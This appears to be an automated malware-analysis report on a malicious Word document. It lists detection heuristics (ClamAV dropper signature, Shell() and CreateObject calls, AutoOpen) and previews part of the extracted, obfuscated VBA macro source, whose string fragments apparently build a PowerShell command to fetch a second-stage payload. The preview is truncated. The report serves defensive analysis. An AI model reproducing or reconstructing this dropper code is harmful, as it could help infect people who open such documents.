MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Word document containing VBA macros. The critical heuristics indicate the presence of a Shell() call and a CreateObject call within the VBA code. The AutoOpen macro marker suggests it executes automatically upon opening. The VBA script, though obfuscated, contains fragments like '\powers' which, combined with the Shell() call, strongly suggests an attempt to execute a command, likely to download and run a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics 7
-
ClamAV: Doc.Dropper.Stratos-6724145-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Stratos-6724145-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60256 bytes |
SHA-256: 8bd409cc77f18cbce82e37a9c34859155f8f4f79e234da0df8c9d4bc7125c7d6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function axgmhw(zttbdmizp, yaqb)
Dim UaOCk As Integer
UaOCk = 21936
kuopqibq8 = Array("qsg", "favi", "genegy", "ZYOi", "i", "on ($frdnrzf+$", "ziji")
jnccyu = 27810
axgmhw = kuopqibq8
End Function
Function idnjy(jjxeya4)
Dim tvtodl8 As Integer
tvtodl8 = -21235
xvaa = Array("uxlia", "hell", "esnndnhqbn", "NyAybx", "oyuycw6")
Dim umjeuiy As Integer
umjeuiy = 13478
idnjy = xvaa
End Function
Function VfvJO(aenre)
cmngkqtx = Array("COBBO", "ywtimxil18", "youy", "XLyxDefpi", "hiwe", "hrxk+$pghz", "r")
VfvJO = cmngkqtx
End Function
Function vuzysbo(AtjIU, skajggg)
bzeuei = Array("woqe", "iuue", "n0+$iqeys+", "qifa", "dida")
NOFY6 = 30986
vuzysbo = bzeuei
Dim sfcaoy
sfcaoy = -12524
End Function
Function ywomdy(owvfo)
eeehp = -16218
mfavxyxgka = Array("ZU='($env';$", "WwtZ", "vlsyxa", "RplvrafNaA", "ppytgwca", "egn")
ywomdy = mfavxyxgka
End Function
Function uvxaeix(rhujhjm, efeo)
uieao7 = Array("jyoep1", "gg';$vbdjlv='j ", "yyrsj", "gupu", "DWANTHO", "ntvnioinhi")
uvxaeix = uieao7
End Function
Function RAGKNXLA(mehgy48, qaga)
CnfrLNnjkxh = Array("BdbCjem8", "osh", "u", "w", "vxucken09", "UO+$eoucmcf+$avwp")
RAGKNXLA = CnfrLNnjkxh
Dim uourl As Integer
uourl = 2735
twcxra = -20709
End Function
Function tcqvswbvqi(akilnlgbk, eodyr)
SFQVIXLI = Array("\powers", "MWENIFQU", "ulkunbtrzq", "YACLY", "iyg", "yiuyi", "pyly8")
tcqvswbvqi = SFQVIXLI
End Function
Function iphejm76(okmnhpn, GgEvKb)
bkwscs = Array("iiiozyu", "hjrhfegiy2", "eouxiupc", "') ';$aiitc=", "yo", "xdg")
iphejm76 = bkwscs
End Function
Function djouafs(edmreg)
hhsaagk71 = Array("kivtxziojk", "hfrzmo", "ROXOABC", "BAcquJio", "-ge ';$abcae5='", "kxoujoa", "ytxeqxea05")
djouafs = hhsaagk71
End Function
Function zeaggo01(ouacn, klbuoy)
RGaYl = Array("jjhucve", "vxgxttzhes", "onhhbo", "='ath=';$Yqb", "qaxe", "coku")
zeaggo01 = RGaYl
End Function
Function eoyuba05(QtuaerC, mzqzxy)
wuabc = Array("uoios", "yyjjyo4", "ruoi+$UUID", "e", "eo", "OcFbw", "hfvquajglm")
Dim yicibbr As Integer
yicibbr = 24219
eoyuba05 = wuabc
End Function
Function ikmwqv(EINJYE, PTBLIMRW)
mkggv = Array("y", "uwq", "qiqbdw46", "mobxne=' '", "w")
ikmwqv = mkggv
Dim emzuksesc As Integer
emzuksesc = -252
End Function
Function tooycp(EKYH, vitxifh)
iyhpu = 17432
ECDYZXK7 = 16007
vchee4 = Array("ell", "net';$rnur", "jozy", "cxoy", "AiVo", "uoxkrniaiz", "egruubaeu")
tooycp = vchee4
End Function
Function xnywmctm(iygwk16, wsiyfkizn)
Dim xphayoe
xphayoe = 25681
tznua74 = Array("ryooa='e -", "pvoetjabhe", "NGsdttvyeUlj13", "kzhhttw", "i", "UbFtAeyy")
Dim blqio
blqio = 22988
Dim uqyu As Integer
uqyu = 30093
xnywmctm = tznua74
End Function
Function PeUuOm(tlalya)
quctblw = 7298
zbnotr = Array("YKRNVUIO", "yeuy", "upgj33", "RJqzm+$EQEMOW0+$smm", "ae", "inte", "eqzwiyuci")
PeUuOm = zbnotr
End Function
Function EIUQGP2(opkey)
bbxyvgade = Array("gka='icy B", "NEowP", "ZWDKUSP7", "KVOEE81", "h", "ie")
EIUQGP2 = bbxyvgade
End Function
Function AzSyoNsi78(obbyszhdxz62, yape)
vzieickq = Array("a", "mdambrorve", "aatpnkycy22", "aygj", "fypu", "b+$VKvaxsgRi+$", "ai")
Dim AKbsrmYw As Integer
AKbsrmYw = -6866
AzSyoNsi78 = vzieickq
End Function
Function ADBoua(ewlfra)
Dim YAEMDYU As Integer
YAEMDYU = -21999
iaynwc = Array("wgaao00", "mfde", "hai+$czuxmoea+$aii", "AdreJdu32", "ocgwy0")
ADBoua = iaynwc
Dim ahjehvf As Integer
ahjehvf = -17545
Dim ttouksgz52 As Integer
ttouksgz52 = 6176
End Function
Function eeasbeu(oetoo, ORLBOBF)
aofqtpha = 30869
yoaaukvex = Array("byhy", "$IqJeIea='a", "ucgbpfd", "ioyeee", "dia")
eeasbeu = yoaaukvex
End Function
Function ukeoaj(euiks)
uadzemcgzj = Array("evmos8", "iudayysc", "uuugblxp", "fo';$Oslcds", "EAEPUOE", "psb", "uu")
ukeoaj = uadzemcgzj
End Function
Functio
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.